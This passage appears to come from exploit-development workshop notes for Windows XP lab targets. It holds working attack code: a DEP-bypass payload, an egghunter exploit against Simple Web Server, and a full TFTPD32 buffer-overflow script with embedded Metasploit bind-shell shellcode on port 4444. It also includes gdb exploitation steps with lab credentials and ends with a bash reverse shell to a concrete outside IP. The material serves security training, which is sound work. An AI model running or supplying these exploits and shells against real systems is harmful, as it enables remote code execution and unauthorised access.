  1908. INT3s - GOOD!!!!!!!
  1909.  
  1910.  
  1911.  
  1912. c:\python27\python.exe warftpd4.py XPSP3-ED-Target-IP
  1913.  
  1914. nc XPSP3-ED-Target-IP 4444
  1915. -----------------------------------------------------------------------
  1916.  
  1917.  
  1918. strategicsec....exploit no workie!!!!
  1919.  
  1920.  
  1921. Why????????? DEP!!!!!!!!!!!!!
  1922.  
  1923.  
  1924.  
  1925.  
  1926. Let's look through ole32.dll for the following instructions:
  1927.  
  1928. mov al,0x1
  1929. ret 0x4
  1930.  
  1931. We need to set al to 0x1 for the LdrpCheckNXCompatibility routine.
  1932.  
  1933.  
  1934. ---------------------------Type This-----------------------------------
  1935.  
  1936. ./msfpescan -D -r "\xB0\x01\xC2\x04" DLLs/xpsp3/ole32.dll
  1937. -----------------------------------------------------------------------
  1938.  
  1939. [DLLs/xpsp3/ole32.dll]
  1940. 0x775ee00e b001c204
  1941. 0x775ee00e mov al, 1
  1942. 0x775ee010 ret 4
  1943.  
  1944.  
  1945. Then we need to jump to the LdrpCheckNXCompatibility routine in
  1946. ntdll.dll that disables DEP.
  1947.  
  1948.  
  1949.  
  1950. Inside of ntdll.dll we need to find the following instructions:
  1951.  
  1952. CMP AL,1
  1953. PUSH 2
  1954. POP ESI
  1955. JE ntdll.7
  1956.  
  1957.  
  1958. ---------------------------Type This-----------------------------------
  1959.  
  1960. ./msfpescan -D -r "\x3C\x01\x6A\x02\x5E\x0F\x84" DLLs/xpsp3/ntdll.dll
  1961. -----------------------------------------------------------------------
  1962.  
  1963. [DLLs/xpsp3/ntdll.dll]
  1964. 0x7c91cd24 3c016a025e0f84
  1965. 0x7c91cd24 cmp al, 1
  1966. 0x7c91cd26 push 2
  1967. 0x7c91cd28 pop esi
  1968. 0x7c91cd29 jz 7
  1969.  
  1970.  
  1971. This set of instructions makes sure that AL is set to 1, 2 is pushed
  1972. on the stack then popped into ESI.
  1973.  
  1974.  
  1975.  
  1976.  
  1977. ---------------------------Type This-----------------------------------
  1978.  
  1979. dep = "\x0e\xe0\x5e\x77"+\
  1980. "\xff\xff\xff\xff"+\
  1981. "\x24\xcd\x91\x7c"+\
  1982. "\xff\xff\xff\xff"+\
  1983. "A"*0x54
  1984.  
  1985.  
  1986.  
  1987.  
  1988. c:\python27\python.exe warftpd5.py XPSP3-ED-Target-IP
  1989.  
  1990. nc XPSP3-ED-Target-IP 4444
  1991. -----------------------------------------------------------------------
  1992.  
  1993.  
  1994. ########################################
  1995. # Lab 2a: Not Enough Space (Egghunter) #
  1996. ########################################
  1997.  
  1998. -----------------------------------------------------------------------
  1999.  
  2000. SWS - SIMPLE WEB SERVER
  2001. -----------------------
  2002.  
  2003. Running SWS on Strategicsec-XP-ED-Target-VM
  2004. Start > Programs > Simple Web Server (it's in the middle somewhere)
  2005. Red icon in system tray
  2006. Double click it
  2007. - it will pop up a menu
  2008. - select "start"
  2009. - dialog box shows starting params - port 82
  2010.  
  2011. WinDBG
  2012. - attach to "server.exe"
  2013.  
  2014. ---------------------------Type This-----------------------------------
  2015.  
  2016. c:\python27\python.exe sws1.py XPSP3-ED-Target-IP
  2017.  
  2018. 0:003> dd eip
  2019. 0:003> dd esp
  2020.  
  2021. c:\python27\python.exe sws2.py XPSP3-ED-Target-IP
  2022.  
  2023. 0:003> dd eip
  2024. 0:003> dd esp
  2025.  
  2026. SSH into the Ubuntu host (user: strategicsec/pass: strategicsec)
  2027. cd /home/strategicsec/toolz/metasploit/tools
  2028. ruby pattern_offset.rb 41356841 <------- You should see that EIP is at 225
  2029. ruby pattern_offset.rb 68413668 <------- You should see that ESP is at 229
  2030.  
  2031. -----------------------------------------------------------------------
  2032.  
  2033.  
  2034.  
  2035.  
  2036.  
  2037.  
  2038.  
  2039. EGGHUNTER:
  2040. ----------
  2041.  
  2042. "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
  2043. "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
  2044. ^^^^^^^^^^^^^^^^
  2045. ABBA
  2046. JMP ESP
  2047. /
  2048. /
  2049. GET /AAAAAAAAAAA...225...AAAAAAAAAA[ EIP ]$egghunter HTTP/1.0
  2050. User-Agent: ABBAABBA LARGE SHELLCODE (Alpha2 encoded)
  2051.  
  2052.  
  2053.  
  2054.  
  2055. -----sws3.py-----
  2056. #!/usr/bin/python2
  2057. import os
  2058. import sys
  2059. import socket
  2060. import struct # for pack function
  2061.  
  2062. if len(sys.argv) < 2:
  2063. sys.stderr.write("Usage: sws3.py <host>\n")
  2064. sys.exit(1)
  2065.  
  2066.  
  2067. target = sys.argv[1]
  2068. port = 82
  2069.  
  2070.  
  2071. pad = "A" * 225 # distance to EIP
  2072. eip = 0x7e429353 # replace EIP to point to "jmp esp" from user32.dll
  2073.  
  2074. egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
  2075. egghunter += "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
  2076.  
  2077. shellcode = "\xCC" * 700
  2078.  
  2079. buf = "GET /"
  2080. buf += pad + struct.pack('<I', eip) + egghunter
  2081. buf += " HTTP/1.0\r\n"
  2082. buf += "User-Agent: ABBAABBA"
  2083. buf += shellcode
  2084. buf += " HTTP/1.0\r\n"
  2085.  
  2086. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # for TCP
  2087. # s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) for UDP
  2088.  
  2089. try:
  2090. s.connect((target, port))
  2091. s.sendall(buf)
  2092. except Exception as e:
  2093. sys.stderr.write("Cannot send to "+str(target)+" : "+str(port)+" : "+str(e)+"!\n")
  2094. finally:
  2095. s.close()
  2096. sys.stderr.write("Sent.\n")
  2097. -----
  2098.  
  2099. ############################################
  2100. # Lab 2b: Not Enough Space (Negative Jump) #
  2101. ############################################
  2102.  
  2103.  
  2104.  
  2105. -----------------------------------------------------------------------
  2106.  
  2107. [pad = distance_to_seh - len(shellcode) ] [ shellcode] [jmp4 = "\x90\x90\xEB\x04"] [eip (pop pop ret)] [jmp_min = "\xE9\x98\xEF\xFF\xFF"]
  2108.  
  2109. ^
  2110. 1 ----------------------1 overflow the buffer---------------------------|
  2111.  
  2112. ^ ^
  2113. |
  2114. 2 ----jump over seh record---|
  2115.  
  2116. ^ ^
  2117. |
  2118. 3--POP 2 words off stack---|
  2119.  
  2120. ^
  2121. 4 -----negative jump into NOPs - then into shellcode -----------------------------------------------------------------------------------|
  2122.  
  2123.  
  2124. #########################################
  2125. # Lab 2c: Not Enough Space (Trampoline) #
  2126. #########################################
  2127.  
  2128. ---------------------------Type This-----------------------------------
  2129.  
  2130. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2c\tftpd_skeleton
  2131. -----------------------------------------------------------------------
  2132.  
  2133.  
  2134. On the Strategicsec-XP-ED-Target-VM VM
  2135.  
  2136. - open a command prompt
  2137. - c:\software\tftpd32
  2138. - run tftpd32.exe
  2139. - UDP port 69
  2140. (socket code is already in the scripts)
  2141.  
  2142.  
  2143.  
  2144.  
  2145. On your attack host please install:
  2146.  
  2147.  
  2148. NASM - Netwide Assembler
  2149.  
  2150.  
  2151.  
  2152.  
  2153.  
  2154. -----------------------------------------------------------------------------------------------------------------
  2155.  
  2156.  
  2157. We want to generate the shellcode (BIND SHELL on Port 4444)
  2158. - No restricted characters
  2159. - Encoder: NONE
  2160.  
  2161. Create a Python file called dumpshellcode.py
  2162.  
  2163. ---
  2164. #!/usr/bin/python2
  2165.  
  2166. import os
  2167. import sys
  2168. import struct
  2169.  
  2170.  
  2171. # win32_bind - EXITFUNC=seh LPORT=4444 Size=317 Encoder=None http://metasploit.com
  2172. shellcode = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
  2173. shellcode += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
  2174. shellcode += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
  2175. shellcode += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
  2176. shellcode += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
  2177. shellcode += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
  2178. shellcode += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
  2179. shellcode += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
  2180. shellcode += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
  2181. shellcode += "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
  2182. shellcode += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
  2183. shellcode += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
  2184. shellcode += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
  2185. shellcode += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
  2186. shellcode += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
  2187. shellcode += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
  2188. shellcode += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
  2189. shellcode += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
  2190. shellcode += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
  2191. shellcode += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
  2192.  
  2193. sys.stdout.write(shellcode)
  2194. ---
  2195.  
  2196.  
  2197.  
  2198. python dumpshell.py > bindshell.bin
  2199.  
  2200. copy bindshellcode.bin into the "c:\Program Files\nasm" directory
  2201.  
  2202.  
  2203.  
  2204. Here we saved the raw shellcode generated by metasploit into a file called bindshell.bin
  2205. 317 bindshell.bin
  2206.  
  2207. ---------------------------Type This-----------------------------------
  2208.  
  2209. C:\Program Files\nasm>ndisasm -b 32 bindshell.bin
  2210. -----------------------------------------------------------------------
  2211.  
  2212. 00000000 FC cld
  2213. 00000001 6AEB push byte -0x15
  2214. 00000003 4D dec ebp
  2215. 00000004 E8F9FFFFFF call dword 0x2
  2216. 00000009 60 pushad
  2217. 0000000A 8B6C2424 mov ebp,[esp+0x24]
  2218. 0000000E 8B453C mov eax,[ebp+0x3c]
  2219. 00000011 8B7C0578 mov edi,[ebp+eax+0x78]
  2220. 00000015 01EF add edi,ebp
  2221. 00000017 8B4F18 mov ecx,[edi+0x18]
  2222. 0000001A 8B5F20 mov ebx,[edi+0x20]
  2223. 0000001D 01EB add ebx,ebp
  2224. 0000001F 49 dec ecx
  2225. 00000020 8B348B mov esi,[ebx+ecx*4]
  2226. 00000023 01EE add esi,ebp
  2227. 00000025 31C0 xor eax,eax
  2228. 00000027 99 cdq
  2229. 00000028 AC lodsb
  2230. 00000029 84C0 test al,al
  2231. 0000002B 7407 jz 0x34
  2232. 0000002D C1CA0D ror edx,0xd
  2233. 00000030 01C2 add edx,eax
  2234. 00000032 EBF4 jmp short 0x28
  2235. 00000034 3B542428 cmp edx,[esp+0x28]
  2236. 00000038 75E5 jnz 0x1f
  2237. 0000003A 8B5F24 mov ebx,[edi+0x24]
  2238. 0000003D 01EB add ebx,ebp
  2239. 0000003F 668B0C4B mov cx,[ebx+ecx*2]
  2240. 00000043 8B5F1C mov ebx,[edi+0x1c]
  2241. 00000046 01EB add ebx,ebp
  2242. 00000048 032C8B add ebp,[ebx+ecx*4]
  2243. 0000004B 896C241C mov [esp+0x1c],ebp
  2244. 0000004F 61 popad
  2245. 00000050 C3 ret
  2246. 00000051 31DB xor ebx,ebx
  2247. 00000053 648B4330 mov eax,[fs:ebx+0x30]
  2248. 00000057 8B400C mov eax,[eax+0xc]
  2249. 0000005A 8B701C mov esi,[eax+0x1c]
  2250. 0000005D AD lodsd
  2251. 0000005E 8B4008 mov eax,[eax+0x8]
  2252. 00000061 5E pop esi
  2253. 00000062 688E4E0EEC push dword 0xec0e4e8e
  2254. 00000067 50 push eax
  2255. 00000068 FFD6 call esi
  2256. 0000006A 6653 push bx
  2257. 0000006C 66683332 push word 0x3233
  2258. 00000070 687773325F push dword 0x5f327377
  2259. 00000075 54 push esp
  2260. 00000076 FFD0 call eax
  2261. 00000078 68CBEDFC3B push dword 0x3bfcedcb
  2262. 0000007D 50 push eax
  2263. 0000007E FFD6 call esi PART 1
  2264. 00000080 5F pop edi
  2265. 00000081 89E5 mov ebp,esp
  2266. 00000083 6681ED0802 sub bp,0x208
  2267. 00000088 55 push ebp
  2268. 00000089 6A02 push byte +0x2
  2269. 0000008B FFD0 call eax
  2270. 0000008D 68D909F5AD push dword 0xadf509d9
  2271. 00000092 57 push edi
  2272. 00000093 FFD6 call esi
  2273. 00000095 53 push ebx
  2274. 00000096 53 push ebx
  2275. --------------------------------------------CUTCUTCUTCUTCUT----8<---8<---8<---
  2276. 00000097 53 push ebx
  2277. 00000098 53 push ebx
  2278. 00000099 53 push ebx
  2279. 0000009A 43 inc ebx
  2280. 0000009B 53 push ebx
  2281. 0000009C 43 inc ebx
  2282. 0000009D 53 push ebx PART 2
  2283. 0000009E FFD0 call eax
  2284. 000000A0 6668115C push word 0x5c11
  2285. 000000A4 6653 push bx
  2286. 000000A6 89E1 mov ecx,esp
  2287. 000000A8 95 xchg eax,ebp
  2288. 000000A9 68A41A70C7 push dword 0xc7701aa4
  2289. 000000AE 57 push edi
  2290. 000000AF FFD6 call esi
  2291. 000000B1 6A10 push byte +0x10
  2292. 000000B3 51 push ecx
  2293. 000000B4 55 push ebp
  2294. 000000B5 FFD0 call eax
  2295. 000000B7 68A4AD2EE9 push dword 0xe92eada4
  2296. 000000BC 57 push edi
  2297. 000000BD FFD6 call esi
  2298. 000000BF 53 push ebx
  2299. 000000C0 55 push ebp
  2300. 000000C1 FFD0 call eax
  2301. 000000C3 68E5498649 push dword 0x498649e5
  2302. 000000C8 57 push edi
  2303. 000000C9 FFD6 call esi
  2304. 000000CB 50 push eax
  2305. 000000CC 54 push esp
  2306. 000000CD 54 push esp
  2307. 000000CE 55 push ebp
  2308. 000000CF FFD0 call eax
  2309. 000000D1 93 xchg eax,ebx
  2310. 000000D2 68E779C679 push dword 0x79c679e7
  2311. 000000D7 57 push edi
  2312. 000000D8 FFD6 call esi
  2313. 000000DA 55 push ebp
  2314. 000000DB FFD0 call eax
  2315. 000000DD 666A64 push word 0x64
  2316. 000000E0 6668636D push word 0x6d63
  2317. 000000E4 89E5 mov ebp,esp
  2318. 000000E6 6A50 push byte +0x50
  2319. 000000E8 59 pop ecx
  2320. 000000E9 29CC sub esp,ecx
  2321. 000000EB 89E7 mov edi,esp
  2322. 000000ED 6A44 push byte +0x44
  2323. 000000EF 89E2 mov edx,esp
  2324. 000000F1 31C0 xor eax,eax
  2325. 000000F3 F3AA rep stosb
  2326. 000000F5 FE422D inc byte [edx+0x2d]
  2327. 000000F8 FE422C inc byte [edx+0x2c]
  2328. 000000FB 93 xchg eax,ebx
  2329. 000000FC 8D7A38 lea edi,[edx+0x38]
  2330. 000000FF AB stosd
  2331. 00000100 AB stosd
  2332. 00000101 AB stosd
  2333. 00000102 6872FEB316 push dword 0x16b3fe72
  2334. 00000107 FF7544 push dword [ebp+0x44]
  2335. 0000010A FFD6 call esi
  2336. 0000010C 5B pop ebx
  2337. 0000010D 57 push edi
  2338. 0000010E 52 push edx
  2339. 0000010F 51 push ecx
  2340. 00000110 51 push ecx
  2341. 00000111 51 push ecx
  2342. 00000112 6A01 push byte +0x1
  2343. 00000114 51 push ecx
  2344. 00000115 51 push ecx
  2345. 00000116 55 push ebp
  2346. 00000117 51 push ecx
  2347. 00000118 FFD0 call eax
  2348. 0000011A 68ADD905CE push dword 0xce05d9ad
  2349. 0000011F 53 push ebx
  2350. 00000120 FFD6 call esi
  2351. 00000122 6AFF push byte -0x1
  2352. 00000124 FF37 push dword [edi]
  2353. 00000126 FFD0 call eax
  2354. 00000128 8B57FC mov edx,[edi-0x4]
  2355. 0000012B 83C464 add esp,byte +0x64
  2356. 0000012E FFD6 call esi
  2357. 00000130 52 push edx
  2358. 00000131 FFD0 call eax
  2359. 00000133 68F08A045F push dword 0x5f048af0
  2360. 00000138 53 push ebx
  2361. 00000139 FFD6 call esi
  2362. 0000013B FFD0 call eax
  2363.  
  2364. -------------------------------------------------------------------------------------------
  2365. Another option would be to go to a website like:
  2366. http://shell-storm.org/online/Online-Assembler-and-Disassembler/
  2367.  
  2368. Choose the bottom box and paste the code below into it. Select x86 (32), and make sure that little endian is checked. Then click "Disassemble"
  2369.  
  2370. "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
  2371. "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
  2372. "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
  2373. "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
  2374. "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
  2375. "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
  2376. "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
  2377. "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
  2378. "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
  2379. "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
  2380. "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
  2381. "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
  2382. "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
  2383. "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
  2384. "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
  2385. "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
  2386. "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
  2387. "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
  2388. "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
  2389. "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
  2390.  
  2391.  
  2392.  
  2393.  
  2394. part1 = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
  2395. part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
  2396. part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
  2397. part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
  2398. part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
  2399. part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
  2400. part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
  2401. part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
  2402. part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
  2403. part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
  2404.  
  2405.  
  2406. part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
  2407. part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
  2408. part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
  2409. part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
  2410. part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
  2411. part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
  2412. part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
  2413. part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
  2414. part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
  2415. part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
  2416. part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
  2417.  
  2418.  
  2419. STACK SHIFTER:
  2420. prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add esp, -1001h
  2421. prepend += "\x44" # inc esp
  2422.  
  2423.  
  2424.  
  2425.  
  2426.  
  2427.  
  2428.  
  2429.  
  2430.  
  2431.  
  2432.  
  2433.  
  2434.  
  2435.  
  2436. ---- final script ----
  2437.  
  2438. #!/usr/bin/python2
  2439. #TFTP Server remote Buffer Overflow
  2440.  
  2441. import sys
  2442. import socket
  2443. import struct
  2444.  
  2445. if len(sys.argv) < 2:
  2446. sys.stderr.write("Usage: tftpd.py <host>\n")
  2447. sys.exit(1)
  2448.  
  2449. target = sys.argv[1]
  2450. port = 69
  2451.  
  2452. eip = 0x7e429353 # jmp esp in USER32.DLL
  2453.  
  2454. part1 += "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
  2455. part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
  2456. part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
  2457. part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
  2458. part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
  2459. part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
  2460. part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
  2461. part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
  2462. part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
  2463. part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
  2464.  
  2465. part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
  2466. part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
  2467. part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
  2468. part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
  2469. part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
  2470. part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
  2471. part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
  2472. part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
  2473. part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
  2474. part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
  2475. part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
  2476.  
  2477. prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add esp, -1001h
  2478. prepend += "\x44" # inc esp
  2479.  
  2480. buf = "\x00\x01" # receive command
  2481.  
  2482. buf += "\x90" * (256 - len(part2)) # NOPs
  2483. buf += part2 # shellcode part 2
  2484. buf += struct.pack('<I', eip) # EIP (JMP ESP)
  2485. buf += prepend # stack shifter
  2486. buf += part1 # shellcode part 1
  2487. buf += "\xE9" + struct.pack('<i', -380) # JMP -380
  2488. buf += "\x00" # END
  2489.  
  2490. # print buf
  2491.  
  2492. # buf = "\x00\x01" # receive command
  2493.  
  2494. # buf += "A" * 300 + "\x00"
  2495.  
  2496. sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  2497.  
  2498. try:
  2499. sock.connect((target, port))
  2500. sock.sendall(buf)
  2501. except Exception as e:
  2502. sys.stderr.write("Cannot send to "+str(target)+" : "+str(port)+" : "+str(e)+"!\n")
  2503. finally:
  2504. sock.close()
  2505. sys.stderr.write("Sent.\n")
  2506.  
  2507.  
  2508.  
  2509. -----------------------------------------------------------------------------------------------------------------
  2510.  
  2511.  
  2512.  
  2513.  
  2514. How does all of this actually work
  2515.  
  2516.  
  2517.  
  2518.  
  2519. Total shellcode length: 315
  2520.  
  2521. Part1: 150
  2522. Part2: 165
  2523.  
  2524.  
  2525. NOPS * (256 - 165)
  2526.  
  2527. 91 NOPS + (165 bytes shellcode p2) + JMP ESP (4 bytes) + Stack Shift (-1000) + (150 bytes shellcode p1) + (neg jmp -380)
  2528. | | |
  2529. 256 260 150 (410) |
  2530. |<------------------------------------------------------------------------------------------------------------|
  2531. Jump to the
  2532. 30 byte mark
  2533.  
  2534.  
  2535.  
  2536.  
  2537.  
  2538. =================================================================================
  2539.  
  2540.  
  2541. ##############################
  2542. # Intro to function chaining #
  2543. ##############################
  2544. ssh into 192.168.1.117
  2545. username: exploitlab
  2546. password: exploitlab
  2547.  
  2548.  
  2549. ---------------------------Type This-----------------------------------
  2550. cd /home/exploitlab
  2551. cat victim2.c
  2552. make victim2
  2553. ./victim2 AAAAAAAAAAAAA
  2554. -----------------------------------------------------------------------
  2555.  
  2556.  
  2557.  
  2558. ---------------------------Type This-----------------------------------
  2559. gdb victim2
  2560. disassemble main
  2561.  
  2562. break *0x080483cb
  2563.  
  2564. run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  2565. -----------------------------------------------------------------------
  2566.  
  2567.  
  2568. ---------------------------Type This-----------------------------------
  2569. bt
  2570. x/i $eip
  2571. x/64x $esp
  2572.  
  2573.  
  2574. quit
  2575. -----------------------------------------------------------------------
  2576.  
  2577.  
  2578.  
  2579.  
  2580. ---------------------------Type This-----------------------------------
  2581. cat frame1.pl
  2582. export EGG=`./frame1.pl`
  2583. gdb victim2
  2584. (gdb) run $EGG
  2585. -----------------------------------------------------------------------
  2586.  
  2587.  
  2588.  
  2589.  
  2590.  
  2591. x/100i 0x80484a5 (looking for a pop/pop/ret)
  2592. quit
  2593. cat frame2.pl
  2594. export EGG=`./frame2.pl`
  2595. gdb victim2
  2596. run $EGG
  2597.  
  2598.  
  2599. stepi
  2600.  
  2601.  
  2602. -------------------------------------------------------------------------------------------------------
  2603.  
  2604.  
  2605.  
  2606.  
  2607.  
  2608.  
  2609.  
  2610.  
  2611. Lots of reverse shells in different languages
  2612. ---------------------------------------------------------------------
  2613.  
  2614.  
  2615.  
  2616. ########
  2617. # Bash #
  2618. ########
  2619.  
  2620. ---------------------------Type This-----------------------------------
  2621.  
  2622. bash -i >& /dev/tcp/45.32.211.184/8080 0>&1
  2623.  
  2624.  
  2625. ----------------------------------------------------------------------
  2626.  
